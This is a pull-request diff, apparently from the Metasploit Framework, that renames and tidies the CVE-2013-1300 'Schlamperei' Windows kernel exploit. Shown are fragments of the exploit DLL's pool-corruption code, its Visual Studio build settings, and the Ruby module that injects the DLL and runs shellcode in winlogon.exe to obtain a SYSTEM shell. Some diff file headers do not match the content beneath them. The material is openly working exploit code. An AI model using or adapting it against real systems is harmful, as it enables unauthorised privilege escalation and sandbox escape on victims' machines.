Merge pull request #1 from OJ/schlamperei

Bring build tools up to date, change some project settings

Author: kyuz0

data/exploits/cve-2013-1300/schlamperei.x86.dll

@@ -1,7 +1,9 @@
 
-Microsoft Visual Studio Solution File, Format Version 11.00
-# Visual Studio 2010
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2013-1300", "cve-2013-1300\cve-2013-1300.vcxproj", "{C093C490-61BF-433E-AEB4-80753B20DEC7}"
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "schlamperei", "schlamperei\schlamperei.vcxproj", "{C093C490-61BF-433E-AEB4-80753B20DEC7}"
 EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution

external/source/exploits/cve-2013-1300/cve-2013-1300.sln

@@ -1,10 +1,9 @@
-/* dllmain.cpp.cpp
- * Exploit for CVE-2013-1300 aka ms13-053
- * Tested on Windows 7 32-bit
- *
- * used in pwn2own 2013 to break out of chrome's sandbox
- *
- * found and exploited by nils and jon of @mwrlabs
+/*!
+ * @file dllmain.cpp
+ * @brief Exploit for CVE-2013-1300 aka ms13-053
+ * @detail Tested on Windows 7 32-bit.
+ *         Used in pwn2own 2013 to break out of chrome's sandbox.
+ *         Found and exploited by nils and jon of @mwrlabs.
  */
 
 #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
@@ -27,6 +26,8 @@ typedef NTSTATUS *PNTSTATUS;
 
 #define TABLE_BASE 0xff910000
 
+#define EXPLOIT_MSG 0xd
+
 // global variables FTW
 HWND gHwnd = 0x0;
 unsigned int gEPROCESS = 0x0;
@@ -132,7 +133,7 @@ BOOL AllocFakeEProcess(DWORD address) {
 
 		addr += 0x10000;
 	}
-	if(res!=0) return false;
+	if(res!=0) return FALSE;
 	memset((void*)addr, 0xab, 0x4000);
 	UINT *eprocess = (UINT*)addr+o;
 	UINT *before = (UINT*)addr;
@@ -152,11 +153,11 @@ BOOL AllocFakeEProcess(DWORD address) {
 	//for(x=0; x<100; x++) second[x] = (0xbeef<<16) + (0xbb00 | x);
 	//second[0x20] = 0x2;
 	//second[0x30] = 0x1;
-	return true;
+	return TRUE;
 }
 
 DWORD wndproc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) {
-	if(msg == 0xd) {
+	if(msg == EXPLOIT_MSG) {
 		// triggering the exploit through WM_GETTEXT
 		// printf("[-] WM_GETTEXT message\n");
 		unsigned char payload[] = "ABCDE   ";
@@ -257,7 +258,7 @@ int Schlamperei(LPVOID shellcode)
 	// so we will copy in 8*2 bytes = 16 bytes to corrupt the pool pointer
 	unsigned char *buf = (unsigned char *)malloc(16);
 	for(int i=0; i<0x40; i++) {
-		NtUserMessageCall(gHwnd, 0xd, 0x8, (LPARAM)buf, 0x0, 0x2b3, 0x10);
+		NtUserMessageCall(gHwnd, EXPLOIT_MSG, 0x8, (LPARAM)buf, 0x0, 0x2b3, 0x10);
 	}
 
 	SendMessage(wnd, 0x401, addressofwnd, 0x0);
@@ -277,7 +278,6 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
 			}
 			break;
 		case DLL_PROCESS_ATTACH:
-			hAppInstance = hinstDLL;
 			Schlamperei(lpReserved);
 			break;
 		case DLL_PROCESS_DETACH:

…013-1300/cve-2013-1300/cve-2013-1300.cpp …/cve-2013-1300/schlamperei/schlamperei.cexternal/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp renamed to external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp renamed to external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c

@@ -1,5 +1,5 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <ItemGroup Label="ProjectConfigurations">
     <ProjectConfiguration Include="Debug|Win32">
       <Configuration>Debug</Configuration>
@@ -13,19 +13,21 @@
   <PropertyGroup Label="Globals">
     <ProjectGuid>{C093C490-61BF-433E-AEB4-80753B20DEC7}</ProjectGuid>
     <Keyword>Win32Proj</Keyword>
-    <RootNamespace>Schlamperei_DLL</RootNamespace>
+    <ProjectName>schlamperei</ProjectName>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
     <ConfigurationType>DynamicLibrary</ConfigurationType>
     <UseDebugLibraries>true</UseDebugLibraries>
     <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
     <ConfigurationType>DynamicLibrary</ConfigurationType>
     <UseDebugLibraries>false</UseDebugLibraries>
     <WholeProgramOptimization>true</WholeProgramOptimization>
     <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
   <ImportGroup Label="ExtensionSettings">
@@ -40,10 +42,16 @@
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
     <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     <IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
     <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
   </PropertyGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <ClCompile>
@@ -73,9 +81,16 @@
       <EnableCOMDATFolding>true</EnableCOMDATFolding>
       <OptimizeReferences>true</OptimizeReferences>
     </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF EXIST "..\..\..\..\..\data\exploits\cve-2013-1300\" GOTO COPY
+    mkdir "..\..\..\..\..\data\exploits\cve-2013-1300\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\cve-2013-1300\"</Command>
+    </PostBuildEvent>
   </ItemDefinitionGroup>
   <ItemGroup>
-    <ClCompile Include="cve-2013-1300.cpp">
+    <ClCompile Include="schlamperei.c">
       <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">NotUsing</PrecompiledHeader>
       <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>

…1300/cve-2013-1300/cve-2013-1300.vcxproj …013-1300/schlamperei/schlamperei.vcxprojexternal/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj renamed to external/source/exploits/cve-2013-1300/schlamperei/schlamperei.vcxproj external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj renamed to external/source/exploits/cve-2013-1300/schlamperei/schlamperei.vcxproj

@@ -24,7 +24,7 @@ def initialize(info={})
         The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). 
         This allows any unprivileged process to freely migrate to winlogon.exe, achieving
         privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox.
-        NOTE: when you exit the meterpreter session, winlogon.exe is lickely to crash.
+        NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -111,7 +111,7 @@ def exploit
     end
 
     print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
-    library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "cve-2013-1300.dll")
+    library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.x86.dll")
     library_path = ::File.expand_path(library_path)
 
     print_status("Injecting exploit into #{process.pid}...")
@@ -120,16 +120,17 @@ def exploit
     thread = process.thread.create(exploit_mem + offset)
     client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000)
 
-
     client.sys.process.each_process do |p|
       if p['name'] == "winlogon.exe"
         winlogon_pid = p['pid']
         print_status("Found winlogon.exe with PID #{winlogon_pid}")
-	if execute_shellcode(payload.encoded, nil, winlogon_pid)
-            print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell")
-	else
-            print_error("Failed to start payload thread")
+
+        if execute_shellcode(payload.encoded, nil, winlogon_pid)
+          print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell")
+        else
+          print_error("Failed to start payload thread")
         end
+
         break
       end
     end